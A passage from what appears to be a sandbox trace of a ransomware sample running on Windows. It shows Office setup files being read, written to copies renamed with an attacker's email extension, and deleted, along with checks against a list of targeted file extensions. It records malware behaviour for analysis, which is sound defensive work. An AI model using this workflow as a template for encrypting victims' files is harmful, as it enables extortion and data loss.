Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.326] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.326] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.326] GetLastError () returned 0x0 [0037.327] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x333, lpOverlapped=0x0) returned 1 [0037.328] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x340, lpOverlapped=0x0) returned 1 [0037.329] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.329] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0037.329] SetEndOfFile (hFile=0x1a8) returned 1 [0037.329] CloseHandle (hObject=0x1a8) returned 1 [0037.330] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.330] SetEndOfFile (hFile=0x1cc) returned 1 [0037.331] CloseHandle (hObject=0x1cc) returned 1 [0037.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.331] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0037.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.331] lstrlenW (lpString=".doc") returned 4 [0037.331] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.331] lstrlenW (lpString=".docx") returned 5 [0037.331] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.331] lstrlenW (lpString=".pdf") returned 4 [0037.332] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString=".xls") returned 4 [0037.332] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString=".xlsx") returned 5 [0037.332] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.332] lstrlenW (lpString=".ppt") returned 4 [0037.332] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString=".zip") returned 4 [0037.332] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.332] lstrlenW (lpString=".rar") returned 4 [0037.332] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString=".bz2") returned 4 [0037.332] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString=".7z") returned 3 [0037.332] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString=".dbf") returned 4 [0037.332] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString=".1cd") returned 4 [0037.332] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString=".jpg") returned 4 [0037.332] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.332] lstrlenW (lpString=".doc") returned 4 [0037.332] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.332] lstrlenW (lpString=".docx") returned 5 [0037.332] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.332] lstrlenW (lpString=".pdf") returned 4 [0037.332] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString=".xls") returned 4 [0037.333] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString=".xlsx") returned 5 [0037.333] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.333] lstrlenW (lpString=".ppt") returned 4 [0037.333] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.333] lstrlenW (lpString=".zip") returned 4 [0037.333] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.333] lstrlenW (lpString=".rar") returned 4 [0037.333] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString=".bz2") returned 4 [0037.333] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString=".7z") returned 3 [0037.333] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.333] lstrlenW (lpString=".dbf") returned 4 [0037.333] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.333] lstrlenW (lpString=".1cd") returned 4 [0037.333] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0037.333] lstrlenW (lpString=".jpg") returned 4 [0037.333] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.333] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0037.333] lstrlenW (lpString="PSCONFIG.CHM") returned 12 [0037.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.334] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=37689) returned 1 [0037.334] CloseHandle (hObject=0x1cc) returned 1 [0037.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20 [0037.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.335] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.335] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.335] GetLastError () returned 0x0 [0037.335] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x9339, lpOverlapped=0x0) returned 1 [0037.338] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9340, lpOverlapped=0x0) returned 1 [0037.339] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.339] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.339] SetEndOfFile (hFile=0x1a8) returned 1 [0037.339] CloseHandle (hObject=0x1a8) returned 1 [0037.340] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.340] SetEndOfFile (hFile=0x1cc) returned 1 [0037.341] CloseHandle (hObject=0x1cc) returned 1 [0037.341] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.342] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1 [0037.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.342] lstrlenW (lpString=".doc") returned 4 [0037.342] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString=".docx") returned 5 [0037.342] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0037.342] lstrlenW (lpString=".pdf") returned 4 [0037.342] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString=".xls") returned 4 [0037.342] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString=".xlsx") returned 5 [0037.342] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0037.342] lstrlenW (lpString=".ppt") returned 4 [0037.342] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.342] lstrlenW (lpString=".zip") returned 4 [0037.342] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString=".rar") returned 4 [0037.342] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.342] lstrlenW (lpString=".bz2") returned 4 [0037.343] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.343] lstrlenW (lpString=".7z") returned 3 [0037.343] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString=".dbf") returned 4 [0037.343] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString=".1cd") returned 4 [0037.343] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString=".jpg") returned 4 [0037.343] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString=".doc") returned 4 [0037.343] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString=".docx") returned 5 [0037.343] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0037.343] lstrlenW (lpString=".pdf") returned 4 [0037.343] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString=".xls") returned 4 [0037.343] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString=".xlsx") returned 5 [0037.343] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0037.343] lstrlenW (lpString=".ppt") returned 4 [0037.343] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.343] lstrlenW (lpString=".zip") returned 4 [0037.343] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString=".rar") returned 4 [0037.343] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.343] lstrlenW (lpString=".bz2") returned 4 [0037.343] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.343] lstrlenW (lpString=".7z") returned 3 [0037.344] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.344] lstrlenW (lpString=".dbf") returned 4 [0037.344] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.344] lstrlenW (lpString=".1cd") returned 4 [0037.344] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0037.344] lstrlenW (lpString=".jpg") returned 4 [0037.344] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.344] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0037.344] lstrlenW (lpString="PSS10O.CHM") returned 10 [0037.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.344] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=26929) returned 1 [0037.344] CloseHandle (hObject=0x1cc) returned 1 [0037.344] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20 [0037.344] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.345] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.345] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.345] GetLastError () returned 0x0 [0037.345] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x6931, lpOverlapped=0x0) returned 1 [0037.347] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6940, lpOverlapped=0x0) returned 1 [0037.348] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.348] WriteFile (in: hFile=0x1a8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0037.349] SetEndOfFile (hFile=0x1a8) returned 1 [0037.349] CloseHandle (hObject=0x1a8) returned 1 [0037.350] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.350] SetEndOfFile (hFile=0x1cc) returned 1 [0037.350] CloseHandle (hObject=0x1cc) returned 1 [0037.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.351] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.351] lstrlenW (lpString=".doc") returned 4 [0037.351] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString=".docx") returned 5 [0037.351] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0037.351] lstrlenW (lpString=".pdf") returned 4 [0037.351] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString=".xls") returned 4 [0037.351] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString=".xlsx") returned 5 [0037.351] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0037.351] lstrlenW (lpString=".ppt") returned 4 [0037.351] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.351] lstrlenW (lpString=".zip") returned 4 [0037.351] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString=".rar") returned 4 [0037.351] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.351] lstrlenW (lpString=".bz2") returned 4 [0037.351] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.352] lstrlenW (lpString=".7z") returned 3 [0037.352] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString=".dbf") returned 4 [0037.352] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString=".1cd") returned 4 [0037.352] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString=".jpg") returned 4 [0037.352] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString=".doc") returned 4 [0037.352] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString=".docx") returned 5 [0037.352] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0037.352] lstrlenW (lpString=".pdf") returned 4 [0037.352] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString=".xls") returned 4 [0037.352] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString=".xlsx") returned 5 [0037.352] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0037.352] lstrlenW (lpString=".ppt") returned 4 [0037.352] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.352] lstrlenW (lpString=".zip") returned 4 [0037.352] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString=".rar") returned 4 [0037.352] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0037.352] lstrlenW (lpString=".bz2") returned 4 [0037.352] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0037.352] lstrlenW (lpString=".7z") returned 3 [0037.352] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0037.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.353] lstrlenW (lpString=".dbf") returned 4 [0037.353] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0037.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 